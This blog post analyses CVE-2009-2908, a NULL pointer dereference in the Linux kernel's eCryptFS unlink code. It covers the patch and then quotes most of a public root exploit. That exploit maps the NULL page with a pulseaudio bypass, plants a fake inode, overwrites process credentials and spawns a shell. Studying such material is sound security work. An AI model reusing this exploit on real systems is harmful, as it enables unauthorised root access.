CVE-2009-2908: Linux kernel eCryptFS NULL Pointer Dereference

This vulnerability was reported by Tyler Hicks and it affects Linux kernel 2.6.31 and probably earlier releases as well. Let’s have a quick look at how eCryptFS’s unlink() is performed…

static int ecryptfs_unlink(struct inode *dir, struct dentry *dentry)
{
        int rc = 0;
        struct dentry *lower_dentry = ecryptfs_dentry_to_lower(dentry);
        struct inode *lower_dir_inode = ecryptfs_inode_to_lower(dir);
        struct dentry *lower_dir_dentry;

        lower_dir_dentry = lock_parent(lower_dentry);
        rc = vfs_unlink(lower_dir_inode, lower_dentry);
     ...
}

This code resides in fs/ecryptfs/inode.c and the snippet above was taken from the 2.6.31 release of the Linux kernel. As you can see, it retrieves the lower dentry using ecryptfs_dentry_to_lower(), locks the parent using lock_parent() and then calls the VFS layer routine vfs_unlink() to perform the actual unlinking.
The latter function can be found in fs/namei.c and, among other things, it executes this:

int vfs_unlink(struct inode *dir, struct dentry *dentry)
{
        int error = may_delete(dir, dentry, 0);
     ...
        /* We don't d_delete() NFS sillyrenamed files--they still exist. */
        if (!error && !(dentry->d_flags & DCACHE_NFSFS_RENAMED)) {
                fsnotify_link_count(dentry->d_inode);
                d_delete(dentry);
        }

        return error;
}

So, unless the dentry’s flags include DCACHE_NFSFS_RENAMED which as we can read from include/linux/dcache.h is simply:

#define DCACHE_NFSFS_RENAMED  0x0002    /* this dentry has been "silly
                                         * renamed" and has to be
                                         * deleted on the last dput()
                                         */

it will call fsnotify_link_count() from include/linux/fsnotify.h to issue a notification that the inode’s link count has changed. Finally, d_delete() from fs/dcache.c is invoked and this will execute the following code:

/**
 * d_delete - delete a dentry
 * @dentry: The dentry to delete
 *
 * Turn the dentry into a negative dentry if possible, otherwise
 * remove it from the hash queues so it can be deleted later
 */
 
void d_delete(struct dentry * dentry)
{
        int isdir = 0;
     ...
        if (atomic_read(&dentry->d_count) == 1) {
                dentry_iput(dentry);
                fsnotify_nameremove(dentry, isdir);
                return;
        }
     ...
}

It performs an atomic read of the dentry’s reference counter, ‘d_count’, and if this is equal to one (meaning the caller is the only user of the dentry), it calls dentry_iput() to release the dentry’s inode, setting ‘d_inode’ to NULL like this:

static void dentry_iput(struct dentry * dentry)
        __releases(dentry->d_lock)
        __releases(dcache_lock)
{
        struct inode *inode = dentry->d_inode;
        if (inode) {
                dentry->d_inode = NULL;
     ...
}

The final call to fsnotify_nameremove() will just issue another notification that the filename was removed from the directory. The problem with the above call to vfs_unlink() from ecryptfs_unlink() was that eCryptFS did not hold a reference of its own on the lower dentry while unlinking it. This means that d_delete() could see a ‘d_count’ of one and set ‘d_inode’ to NULL even though the upper eCryptFS dentry still pointed to that lower dentry. A user could then use read() or write() on a file that was still open to reach that inode, leading to a NULL pointer dereference. For example, here is some code from the ecryptfs_read_update_atime() routine:

/**
 * ecryptfs_read_update_atime
 *
 * generic_file_read updates the atime of upper layer inode.  But, it
 * doesn't give us a chance to update the atime of the lower layer
 * inode.  This function is a wrapper to generic_file_read.  It
 * updates the atime of the lower level inode if generic_file_read
 * returns without any errors. This is to be used only for file reads.
 * The function to be used for directory reads is ecryptfs_read.
 */
static ssize_t ecryptfs_read_update_atime(struct kiocb *iocb,
                                const struct iovec *iov,
                                unsigned long nr_segs, loff_t pos)
{
        int rc;
        struct dentry *lower_dentry;
     ...
                lower_dentry = ecryptfs_dentry_to_lower(file->f_path.dentry);
                lower_vfsmount = ecryptfs_dentry_to_lower_mnt(file->f_path.dentry);
                touch_atime(lower_vfsmount, lower_dentry);
     ...
}

Here, it retrieves the lower dentry and then uses it in touch_atime(). If we move to that routine we’ll see what will happen in case of NULL ‘d_inode’ because of the previous unchecked call to vfs_unlink()…

void touch_atime(struct vfsmount *mnt, struct dentry *dentry)
{
        struct inode *inode = dentry->d_inode;
        struct timespec now;
     ...
        if (inode->i_flags & S_NOATIME)
     ...
        if (IS_NOATIME(inode))
     ...
        if ((inode->i_sb->s_flags & MS_NODIRATIME) && S_ISDIR(inode->i_mode))
     ...
        if ((mnt->mnt_flags & MNT_NODIRATIME) && S_ISDIR(inode->i_mode))
     ...
        now = current_fs_time(inode->i_sb);
     ...
        inode->i_atime = now;
}
EXPORT_SYMBOL(touch_atime);

So, multiple NULL pointer dereferences arise since ‘dentry->d_inode’ could be NULL. A similar scenario also appears when calling ecryptfs_getxattr() which, as we can read from fs/ecryptfs/inode.c, is just a wrapper around ecryptfs_getxattr_lower() like this:

ecryptfs_getxattr(struct dentry *dentry, const char *name, void *value,
                  size_t size)
{
        return ecryptfs_getxattr_lower(ecryptfs_dentry_to_lower(dentry), name,
                                       value, size);
}

Here we can find something really handy regarding the exploitation of that vulnerability… Since ecryptfs_getxattr() will access the lower dentry, meaning the one that might contain a NULL ‘d_inode’, it would result in some interesting behavior in case of this code path…

ssize_t
ecryptfs_getxattr_lower(struct dentry *lower_dentry, const char *name,
                        void *value, size_t size)
{
     ...
        if (!lower_dentry->d_inode->i_op->getxattr) {
     ...
        mutex_lock(&lower_dentry->d_inode->i_mutex);
        rc = lower_dentry->d_inode->i_op->getxattr(lower_dentry, name, value,
                                                   size);
        mutex_unlock(&lower_dentry->d_inode->i_mutex);
     ...
}

So, if the ‘lower_dentry->d_inode->i_op->getxattr’ function pointer is not NULL, which it is definitely not going to be, it will lock the “NULL->i_mutex” lock and then call the callback routine located at “NULL->i_op->getxattr”, leading to quite simple code execution if you have mapped some function pointer there.
Anyway, this was patched by updating ecryptfs_unlink() to call dget() on the lower dentry before locking the parent like this:

        struct dentry *lower_dir_dentry;
 
+       dget(lower_dentry);
        lower_dir_dentry = lock_parent(lower_dentry);

And by calling dput() under its ‘out_unlock’ label to drop that reference like this:

 out_unlock:
        unlock_dir(lower_dir_dentry);
+       dput(lower_dentry);
        return rc;
 }

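Those two functions can be found in include/linux/dcache.h and fs/dcache.c respectively, and they use atomic operations to increment and release the dentry’s reference counter (‘d_count’). With the extra reference held, d_delete() no longer sees a count of one during the unlink, so it does not turn the lower dentry into a negative one.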
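
To illustrate why the extra reference matters, here is a minimal userspace sketch of the d_delete() branch quoted earlier. Everything in it (the toy_* structures and helpers, inode_survives()) is a simplified stand-in I made up for illustration and not the kernel’s real code; it only models the counter check and the ‘d_inode’ assignment:

```c
#include <assert.h>
#include <stdatomic.h>
#include <stddef.h>

/* Toy stand-ins for the kernel structures; not the real definitions. */
struct toy_inode { int ino; };

struct toy_dentry {
    atomic_int d_count;          /* reference count */
    struct toy_inode *d_inode;   /* NULL means a "negative" dentry */
    int unhashed;                /* set when dropped from the hash */
};

/* Take an extra reference, in the spirit of dget(). */
static struct toy_dentry *toy_dget(struct toy_dentry *d)
{
    assert(d != NULL);
    atomic_fetch_add(&d->d_count, 1);
    return d;
}

/* Drop a reference, in the spirit of dput() (freeing is not modelled). */
static void toy_dput(struct toy_dentry *d)
{
    assert(d != NULL && atomic_load(&d->d_count) > 0);
    atomic_fetch_sub(&d->d_count, 1);
}

/* Models only the d_count == 1 decision made by d_delete(). */
static void toy_d_delete(struct toy_dentry *d)
{
    if (atomic_load(&d->d_count) == 1) {
        d->d_inode = NULL;       /* sole user: dentry turns negative */
        return;
    }
    d->unhashed = 1;             /* other users exist: only unhash it */
}

/* Returns 1 if d_inode is still set after the delete, 0 if it is NULL. */
static int inode_survives(int take_extra_ref)
{
    struct toy_inode inode = { 42 };
    struct toy_dentry d;
    int alive;

    atomic_init(&d.d_count, 1);
    d.d_inode = &inode;
    d.unhashed = 0;

    if (take_extra_ref)
        toy_dget(&d);            /* what the patch adds before the unlink */
    toy_d_delete(&d);
    alive = (d.d_inode != NULL);
    if (take_extra_ref)
        toy_dput(&d);            /* what the patch adds at out_unlock */
    return alive;
}
```

Calling inode_survives(0) models the unpatched path, where the inode pointer is cleared, while inode_survives(1) models the patched one, where it is kept.
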
Now, to the exploitation. Recently, a Greek guy (named Fotis Loukos – fotisl) released exploit code for this vulnerability. I have to admit that I’m sad to see Greek people doing such stuff but of course, it’s his life.
So, let’s have a look at how he exploits this bug…

 * The final memory map is the following
 *
 * |              |
 * |              |
 * |     0x9c     | d_inode->i_op = 0x0, see location 0x44
 * |              |
 * |              |
 * |     0x78     | d_inode->i_mutex = 0x10 where we created our mutex
 * |              |
 * |              |
 * |     0x44     | d_inode->i_op->getxattr will point to the code
 * |              |
 * |              |
 * |     0x20     | mutex->owner
 * |              |
 * |              |
 * |     0x10     | mutex for the mutex_lock call
 * |              |
 * |              |
 * |-----NULL-----|
 *
 */
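
To make the map above easier to follow, here is a minimal userspace sketch that simulates the first page as an ordinary byte buffer and walks the same chain the kernel would walk for inode->i_op->getxattr when the inode pointer is NULL. The helper names (peek32, poke32, resolve_getxattr, demo_chain) are mine, the 32-bit offsets are the ones from the comment, and nothing here touches address zero or the kernel:

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define SIM_PAGE_SIZE          0x1000
#define INODE_IOP_OFF          0x9c   /* offsets quoted in the comment above */
#define INODEOPS_GETXATTR_OFF  0x44

/* Read a 32-bit value at the given offset of the simulated page. */
static uint32_t peek32(const unsigned char *page, uint32_t off)
{
    uint32_t v;

    assert(off + sizeof(v) <= SIM_PAGE_SIZE);
    memcpy(&v, page + off, sizeof(v));
    return v;
}

/* Write a 32-bit value at the given offset of the simulated page. */
static void poke32(unsigned char *page, uint32_t off, uint32_t v)
{
    assert(off + sizeof(v) <= SIM_PAGE_SIZE);
    memcpy(page + off, &v, sizeof(v));
}

/*
 * Follow inode->i_op->getxattr with the "inode" sitting at offset 0 of
 * the page, and return whatever value is stored in the getxattr slot.
 */
static uint32_t resolve_getxattr(const unsigned char *page)
{
    uint32_t i_op = peek32(page, INODE_IOP_OFF);        /* inode->i_op   */
    return peek32(page, i_op + INODEOPS_GETXATTR_OFF);  /* i_op->getxattr */
}

/* Lay out the two slots as in the map and resolve the chain. */
static uint32_t demo_chain(uint32_t handler_tag)
{
    unsigned char page[SIM_PAGE_SIZE];

    memset(page, 0, sizeof(page));
    poke32(page, INODE_IOP_OFF, 0x0);                   /* i_op = 0x0      */
    poke32(page, INODEOPS_GETXATTR_OFF, handler_tag);   /* slot at 0x44    */
    return resolve_getxattr(page);
}
```

Since ‘i_op’ is read back as 0x0, the getxattr slot is looked up at 0x0 + 0x44, which is why the map says “see location 0x44”.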

His aim is to utilize the code path I described through the getxattr() callback. This means that he’ll have to create, in the first page of the virtual address space, a structure similar to the one he gave in the initial comments. Now, to the actual code…

/*
 * It works from pulseaudio
 */
int pa__init(void *m)
{
    char *path = getenv("XPL_PATH");

    if(path == NULL) {
        printf("Error: XPL_PATH env variable doesn't contain a path.\n");
        exit(1);
    }

    runexploit(path);
}

void pa__done(void *m)
{
}

/*
 * And as standalone
 */
int main(int argc, char **argv)
{
    if(argc != 2) {
        printf("Usage: %s <path>\n", argv[0]);
        exit(1);
    }

    frommain = 1;
    runexploit(argv[1]);
}

As you can see, he uses “pa__init()” which means that you can load it as a pulseaudio module to bypass the MMAP_MIN_ADDR restriction. However, he also provides the ability to execute it as a standalone application directly from the main() routine. In either case, runexploit() is executed, so let’s have a look at it…

#define INODE_MUTEX_OFF         0x78
#define INODE_IOP_OFF           0x9c
#define INODEOPS_GETXATTR_OFF   0x44

#define TASK_RUNNING 0

struct list_head {
    struct list_head *next, *prev;
};

struct mymutex {
    int count;
    unsigned int wait_lock;
    struct list_head wait_list;
    /* No, I won't define a thread_info struct here */
    void *owner;
};
    ...
/*
 * We run it here so it works both when run from command line and using
 * pulseaudio.
 */
int runexploit(char *path)
{
    struct mymutex *mutex;

    /* The personality trick */
    if(personality(0xffffffff) == PER_SVR4) {
        if(mprotect(0x0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC) == -1) {
            perror("mprotect");
            exit(1);
        }
    } else if(mmap(0x0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED |
                MAP_ANONYMOUS | MAP_PRIVATE, 0, 0) == MAP_FAILED) {
        perror("mmap");
        exit(1);
    }

    uid = getuid();
    gid = getgid();

    /* Set up everything here */
    *(unsigned long *) INODE_IOP_OFF = 0x0;
    *(unsigned long *) INODE_MUTEX_OFF = 0x10;
    *(unsigned long *) INODEOPS_GETXATTR_OFF = (unsigned long) getroot;

    mutex = (struct mymutex *) 0x10;
    mutex->count = 0;
    mutex->wait_lock = 0;
    mutex->wait_list.prev = &mutex->wait_list;
    mutex->wait_list.next = &mutex->wait_list;
    mutex->owner = (void *) 0x20;

    trigger(path);

    execl("/bin/sh", "sh", NULL);
}

He retrieves the current personality and if it equals the System V Release 4 one (the pulseaudio bypass trick), he changes the NULL page’s permissions to readable/writable/executable using mprotect(2). Otherwise, he uses mmap(2) to attempt to map it. It is important to note here that he always uses ‘0x1000’ as the page size, which isn’t really portable in my opinion. Dynamically retrieving the page size through getpagesize(2) would be much better.
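
As a small sketch of that suggestion, the page size can be queried at run time. I am using sysconf(_SC_PAGESIZE) here, which is the POSIX way of obtaining the same value as getpagesize(2); the helper names runtime_page_size() and round_up_to_page() are my own:

```c
#include <assert.h>
#include <stddef.h>
#include <unistd.h>

/* Query the page size at run time; returns 0 if it cannot be determined. */
static size_t runtime_page_size(void)
{
    long sz = sysconf(_SC_PAGESIZE);

    return sz > 0 ? (size_t)sz : 0;
}

/* Round len up to a whole number of pages of the given size. */
static size_t round_up_to_page(size_t len, size_t page)
{
    assert(page != 0 && (page & (page - 1)) == 0);   /* power of two */
    return (len + page - 1) & ~(page - 1);
}
```

A mapping length would then be computed as round_up_to_page(len, runtime_page_size()) instead of assuming 0x1000.
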
After getting the NULL page, the variables ‘uid’ and ‘gid’ are set to the current ones and the malicious structure is constructed using the hard-coded values ‘INODE_IOP_OFF’, ‘INODE_MUTEX_OFF’ and ‘INODEOPS_GETXATTR_OFF’. This is also bad practice since those offsets might not work on 64-bit systems. A better solution would be to create dummy structures mirroring the original inode and inode_operations structures from include/linux/fs.h and use them to calculate the offsets at compile time.
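
The general technique is just offsetof() from <stddef.h>. The sketch below uses heavily simplified, hypothetical structures (toy_inode, toy_mutex, toy_inode_operations) that do NOT match the real kernel layouts; it only shows how the compiler can derive member offsets for whatever ABI it targets, instead of the programmer hard-coding them:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical, simplified stand-ins; NOT the real kernel layouts. */
struct toy_inode_operations {
    void *create;
    void *lookup;
    long (*getxattr)(void *dentry, const char *name, void *value, size_t size);
};

struct toy_mutex {
    int count;
    unsigned int wait_lock;
    void *owner;
};

struct toy_inode {
    unsigned long i_ino;
    struct toy_mutex i_mutex;
    const struct toy_inode_operations *i_op;
};

/* Offsets computed by the compiler for the target ABI. */
enum {
    TOY_INODE_MUTEX_OFF       = offsetof(struct toy_inode, i_mutex),
    TOY_INODE_IOP_OFF         = offsetof(struct toy_inode, i_op),
    TOY_INODEOPS_GETXATTR_OFF = offsetof(struct toy_inode_operations, getxattr)
};

/* Read the i_op member back through its raw byte offset. */
static const struct toy_inode_operations *
iop_via_offset(const struct toy_inode *inode)
{
    const unsigned char *base = (const unsigned char *)inode;
    const struct toy_inode_operations *ops;

    assert(inode != NULL);
    memcpy(&ops, base + TOY_INODE_IOP_OFF, sizeof(ops));
    return ops;
}
```

Building the same file for a 32-bit and a 64-bit target yields different values for the three constants without any source change, which is the point of the suggestion.
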
After creating the malicious structure, he initializes his mutex structure (where, by the way, he lets the compiler calculate the member offsets) by placing it at address 0x10, setting its owner to the address 0x20 and initializing its count, lock and wait list appropriately.
Finally, since the NULL page is now ready to trick the kernel into believing that it contains a valid inode, he calls trigger()…

/*
 * Go go go!
 */
void trigger(char *path)
{
    char buf1[128], buf2[128];
    int fd;

    snprintf(buf1, 128, "%s/lala", path);
    snprintf(buf2, 128, "%s/koko", path);

    if(open(buf1, O_RDWR | O_CREAT | O_EXCL | O_NOFOLLOW, 0600) < 0)
        return;
    link(buf1, buf2);
    unlink(buf1);
    if((fd = open(buf2, O_RDWR | O_CREAT | O_NOFOLLOW, 0600)) < 0)
        return;
    unlink(buf2);
    write(fd, "kot!", 4);
}

This code is similar to the trigger strace output provided by Tyler Hicks. He creates the file ‘buf1’ using open(2), then uses link(2) to create a hardlink named ‘buf2’ so that the inode stays alive. He unlinks ‘buf1’ to go through the vfs_unlink() call in ecryptfs_unlink(), opens ‘buf2’ with open(2) and then unlinks it as well while the file descriptor is still open. At this point the lower dentry can end up with a ‘d_inode’ pointing to NULL. Finally, to force the kernel into accessing that inode he uses a dummy write(2) call on the open descriptor.
For completeness, here are the remaining routines from the ‘paokara.c’ exploit code…

/*
 * Since ecryptfs appeared in 2.6.19 there is no need to support 2.4 stuff,
 * such as the task_struct being at the end of the kernel stack.
 */
static inline unsigned long get_current()
{
    unsigned long current;

    /* We begin by checking for a 4k stack */
    current = (unsigned long) &current;
    current = *(unsigned long *)(current & ~(0x1000 - 1));
    stacksize = 0x1000;

    if((current >= 0xc0000000) && (*(unsigned long *)current == TASK_RUNNING))
        return current;

    /* It's probably 8k */
    current = (unsigned long) &current;
    current = *(unsigned long *)(current & ~(0x2000 - 1));
    stacksize = 0x2000;

    if((current >= 0xc0000000) && (*(unsigned long *)current == TASK_RUNNING))
        return current;

    /* It's... shit */
    return 0;
}
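
The masking step used twice in get_current() above is ordinary power-of-two alignment arithmetic: clearing the low bits of an address that lies inside an aligned region gives the base of that region. A minimal sketch, with region_base() being a helper name of my own:

```c
#include <assert.h>
#include <stdint.h>

/* Round an address down to the base of an aligned, power-of-two sized region. */
static uintptr_t region_base(uintptr_t addr, uintptr_t size)
{
    assert(size != 0 && (size & (size - 1)) == 0);   /* power of two */
    return addr & ~(size - 1);
}
```

For an example address of 0xc1235abc, a 4KB region starts at 0xc1235000 while an 8KB region starts at 0xc1234000, which is why the routine has to try both sizes.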

This is simple code that retrieves the current process’ ‘task_struct’ and works for both 4KB and 8KB stacks. And the getroot() function is…

/*
 * This will be run by the kernel.
 */
static ssize_t getroot()
{
    unsigned long *current, *real_cred, *cred;
    int i, j;

    if(!(current = (unsigned long *) get_current()))
        return 0;

    /* The following should work till 2.6.28.10 since 2.6.29 uses COW */
    for(i = 0; i < stacksize; i++) {
        if((current[0] == uid) && (current[1] == uid) &&
                (current[2] == uid) && (current[3] == uid) &&
                (current[4] == gid) && (current[5] == gid) &&
                (current[6] == gid) && (current[7] == gid)) {
            current[0] = current[1] = current[2] = current[3] = 0;
            current[4] = current[5] = current[6] = current[7] = 0;
            return 0;
        }
        current++;
    }

    current = (unsigned long *) get_current();

    /* COW creds on  kernel ver >= 2.6.29 */
    real_cred = cred = NULL;
    for(i = 0; i < stacksize - 16; i++) {
        if(((frommain == 1) && (!memcmp((char *) current, "paokara", 7))) ||
                ((frommain == 0) && (!memcmp((char *) current,
                "pulseaudio", 10)))) {
            /*
             * Found comm, we must go back, search for the mutex and then
             * back again for the cred structs.
             */
            for(j = 0; j < stacksize - i - 12; j++) {
                if(*(unsigned int *)current == 1) {
                    real_cred = *((unsigned long **) current - 3);
                    cred = *((unsigned long **) current - 2);
                    break;
                }
                current--;
            }
            break;
        }
        current++;
    }

    if(real_cred) {
        /* Skip counter */
        real_cred++;
        cred++;

        if((real_cred[0] == uid) && (real_cred[1] == gid) &&
                (real_cred[2] == uid) && (real_cred[3] == gid) &&
                (real_cred[4] == uid) && (real_cred[5] == gid) &&
                (real_cred[6] == uid) && (real_cred[7] == gid)) {
            real_cred[0] = real_cred[1] = real_cred[2] = real_cred[3] = 0;
            real_cred[4] = real_cred[5] = real_cred[6] = real_cred[7] = 0;
        }

        if((cred[0] == uid) && (cred[1] == gid) &&
                (cred[2] == uid) && (cred[3] == gid) &&
                (cred[4] == uid) && (cred[5] == gid) &&
                (cred[6] == uid) && (cred[7] == gid)) {
            cred[0] = cred[1] = cred[2] = cred[3] = 0;
            cred[4] = cred[5] = cred[6] = cred[7] = 0;
        }
    }

    return 0;
}

He uses get_current() to get the current ‘task_struct’ and then he iterates over the structure to find the credentials and update them to those of root. He also included code for the newer, copy-on-write credential records. Back in runexploit(), the last call to be executed will spawn a shell, hopefully with the privileges of the overwritten credential record.

Written by xorl

October 18, 2009 at 17:19

Posted in linux, vulnerabilities
